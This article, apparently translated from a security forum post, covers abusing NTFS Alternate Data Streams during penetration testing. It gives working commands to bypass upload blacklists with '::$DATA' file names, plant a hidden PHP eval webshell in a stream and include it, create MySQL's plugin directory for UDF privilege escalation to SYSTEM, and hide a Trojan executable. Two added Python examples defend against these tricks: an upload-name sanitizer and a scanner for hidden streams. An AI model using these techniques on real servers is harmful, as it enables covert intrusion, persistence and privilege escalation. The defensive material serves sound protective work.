For a brief introduction to ADS (NTFS Alternate Data Streams), see the earlier article on the unfavorable aspects of NTFS.
ADS has attracted the attention of security researchers for a long time, and some classic uses have been published, such as hiding files and hiding webshells (see "Alternate Data Streams (ADS) and the past and present of IIS"). With the recently disclosed IIS permission bypass, we tested the use of ADS in penetration testing once again and found some interesting phenomena.
1. Classic IIS directory access permission bypass
For details, see "Microsoft IIS 6.0 and 7.5 Multiple Vulnerabilities".
Note: the permission here is the NTFS directory attribute permission; this does not directly bypass the admin back-end login. Do not misunderstand.
2. Bypassing blacklist verification
During testing we found that if the uploaded file is named test.php::$DATA, a file named test.php is generated on the server; its content is the same as the uploaded file, and the server parses it. Assume the uploaded file contains <?php phpinfo(); ?>. The upload results are as follows:
Uploaded file name            File generated on the server   File content
test.php:a.jpg                test.php                       empty
test.php::$DATA               test.php                       <?php phpinfo(); ?>
test.php::$INDEX_ALLOCATION   test.php (a folder)            -
test.php::$DATA\0.jpg         0.jpg                          <?php phpinfo(); ?>
test.php::$DATA\aaa.jpg       aaa.jpg                        <?php phpinfo(); ?>
PS: uploading test.php:a.jpg actually generates a data stream file on the server. You can view its content with notepad test.php:a.jpg, while test.php itself is a normal, empty file.
Based on the second phenomenon, we can bypass some blacklist verification.
When I appended \0 to test, I intended it to truncate what followed, but I found that Windows discards everything before the \ or / and only recognizes the string after them (Windows treats \ and / as directory separators, and the upload only keeps the file name).
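As an added example (not part of the original post), here is a Python upload-name check that closes the bypass above from the defender's side: it rejects NUL bytes, any directory component (both \ and / count as separators, which is why test.php::$DATA\0.jpg ends up stored as 0.jpg), and any colon, which is the NTFS stream separator, and then enforces an extension allowlist instead of a blacklist. The allowlist and the candidate names are constructed for the example.

```python
import posixpath

# Constructed allowlist for an image-upload endpoint (example only).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


class UnsafeFilename(ValueError):
    """Raised when an uploaded name could be interpreted unexpectedly by NTFS/Win32."""


def sanitize_upload_name(raw_name: str) -> str:
    """Return the bare basename if it is safe to store, else raise UnsafeFilename."""
    if "\x00" in raw_name:
        raise UnsafeFilename("NUL byte in filename")
    # Windows accepts both '\' and '/' as directory separators and keeps only the
    # last component, so 'test.php::$DATA\0.jpg' is stored as '0.jpg'.
    normalized = raw_name.replace("\\", "/")
    if posixpath.basename(normalized) != normalized or normalized in ("", ".", ".."):
        raise UnsafeFilename("directory component in filename")
    base = normalized
    # ':' is the NTFS stream separator ('file:stream' or 'file::$DATA');
    # a legitimate upload name never needs it.
    if ":" in base:
        raise UnsafeFilename("NTFS stream syntax in filename")
    # Win32 silently strips trailing dots and spaces, which would change the
    # effective extension after this check has passed.
    if base != base.rstrip(". "):
        raise UnsafeFilename("trailing dot or space in filename")
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        raise UnsafeFilename("extension not in allowlist")
    return base


def check_upload_names(names):
    """Classify each candidate name as 'ok' or 'rejected: <reason>'."""
    result = {}
    for name in names:
        try:
            sanitize_upload_name(name)
            result[name] = "ok"
        except UnsafeFilename as exc:
            result[name] = f"rejected: {exc}"
    return result


if __name__ == "__main__":
    # Names from the upload table above plus two ordinary ones (constructed).
    candidates = [
        "test.php:a.jpg",
        "test.php::$DATA",
        "test.php::$INDEX_ALLOCATION",
        "test.php::$DATA\\0.jpg",
        "test.php::$DATA\\aaa.jpg",
        "photo.jpg",
        "shell.php",
    ]
    for name, verdict in check_upload_names(candidates).items():
        print(f"{name!r:32} {verdict}")
```

The check is applied to the name the server will actually write, and the server should generate its own storage name (a random token plus the validated extension) rather than reuse the client-supplied one; the allowlist is what makes the ::$DATA and stream-name variants irrelevant, since no name containing a colon can ever pass.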
3. Exploitation for hiding a webshell
Method: echo a data stream file on the server. For example, index.php is a normal web page file; we can do this:
echo ^<?php @eval($_REQUEST[cmd])?^> > index.php:hidden.jpg
This generates an invisible shell, hidden.jpg. A normal file manager, as well as the type, dir and del commands, cannot find the hidden.jpg file. We can then include this ADS file from another normal file: <?php include('index.php:hidden.jpg') ?>. In this way our one-line shell is parsed normally.
4. Exploitation in UDF privilege escalation
UDF privilege escalation tips: if the database user has INSERT and DELETE privileges on the mysql database (note: this refers to the default database named mysql), a custom function can be created and loaded. Because MySQL on a Windows host runs with SYSTEM privileges, commands can be executed with SYSTEM privileges through a user-defined function.
In MySQL 5.1 and above (all current versions are 5.6; the old versions are presumably no longer common), when loading a user-defined function DLL, the DLL must be located in the lib\plugin\ directory under the MySQL directory. Importing it directly into a directory such as C:\windows\system32 cannot load the DLL, so CREATE FUNCTION fails. Sadly, however, MySQL 5.1 and later do not create the lib\plugin directory by default during installation unless the full version is installed (the official package of more than 200 MB).
In other cases, for example, you have obtained a webshell but its permissions are restricted so you cannot create the lib\plugin directory, or you have no webshell at all, only a weak MySQL password (UDF privilege escalation without a webshell, Serv-U and so on). In the past we would probably have just given up, but with ADS we can get around this restriction.
Demo:
select 'xxx' into outfile 'd:\mysql\lib::$INDEX_ALLOCATION';
A lib directory is generated under the MySQL directory.
5. Using ADS to hide a Trojan
Hide it by running the following command in cmd: type muma.exe > test.txt:muma.exe
This writes the Trojan into a data stream of test.txt. However, running it still requires other tools; WinRAR is one of them, and the specific methods can be found on Baidu Baike. Do not trust the encyclopedia's method, though: it fails, and you must use the type command to write the binary executable file. So I have not studied this exploitation further.
NOTE: if an executable file is in a data stream, calling it with the start command fails on Windows XP and Windows 2003.
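Tricks 3 and 5 both rely on named streams that neither dir nor a file manager shows. As an added example (not from the original post), the Python script below parses the output of dir /r, which lists each alternate data stream on an indented line beneath its host file in the form size file:stream:$DATA, and reports every named stream except the browser-set Zone.Identifier. The dir /r listing is a constructed sample, not captured from a real server.

```python
import os
import re

# Constructed sample of `dir /r` output; `dir /R` lists each alternate data
# stream on an indented line beneath its host file as `<size> <file>:<stream>:$DATA`.
SAMPLE_DIR_R = """\
 Volume in drive D has no label.
 Volume Serial Number is 1234-ABCD

 Directory of D:\\www

03/01/2014  10:00 AM    <DIR>          .
03/01/2014  10:00 AM    <DIR>          ..
03/01/2014  10:02 AM             1,204 index.php
                                    38 index.php:hidden.jpg:$DATA
03/01/2014  10:05 AM                 0 test.txt
                                73,802 test.txt:muma.exe:$DATA
03/01/2014  10:06 AM               512 about.html
                                    26 about.html:Zone.Identifier:$DATA
               3 File(s)          1,716 bytes
               2 Dir(s)  10,000,000,000 bytes free
"""

# Stream lines start with whitespace, then the size, then host:stream:$DATA.
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA$")

# Streams that commonly appear on legitimate files (browser download marker).
BENIGN_STREAMS = {"Zone.Identifier"}

# Stream names that are executable or server-side script by extension.
RISKY_EXTENSIONS = {".exe", ".dll", ".com", ".bat", ".cmd", ".ps1", ".vbs",
                    ".php", ".asp", ".aspx", ".jsp"}


def parse_dir_r(text):
    """Map each host file to a list of (stream_name, size_in_bytes)."""
    streams = {}
    for line in text.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size, host, stream = m.groups()
            streams.setdefault(host, []).append((stream, int(size.replace(",", ""))))
    return streams


def find_suspicious_streams(text):
    """Return sorted (host:stream, size, reason) for every non-benign stream.

    The extension of the stream name only ranks the finding; a stream called
    hidden.jpg can hold PHP just as well, so every unexpected stream is reported.
    """
    findings = []
    for host, entries in parse_dir_r(text).items():
        for stream, size in entries:
            if stream in BENIGN_STREAMS:
                continue
            ext = os.path.splitext(stream)[1].lower()
            reason = ("executable or script extension" if ext in RISKY_EXTENSIONS
                      else "unexpected named stream")
            findings.append((f"{host}:{stream}", size, reason))
    return sorted(findings)


if __name__ == "__main__":
    for name, size, reason in find_suspicious_streams(SAMPLE_DIR_R):
        print(f"{name:28} {size:>8} bytes  {reason}")
```

dir /r is available from Windows Vista / Server 2008 onwards; on the XP and 2003 systems the note above mentions, Sysinternals streams.exe produces an equivalent listing, and on PowerShell hosts Get-Item -Stream * does the same. Whichever source is used, the useful signal for a web root is simply "any named stream that is not Zone.Identifier", because the page's own trick stores PHP under an image-like stream name.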
-- By: pylove & Rstar http://zone.wooyun.org/content/1064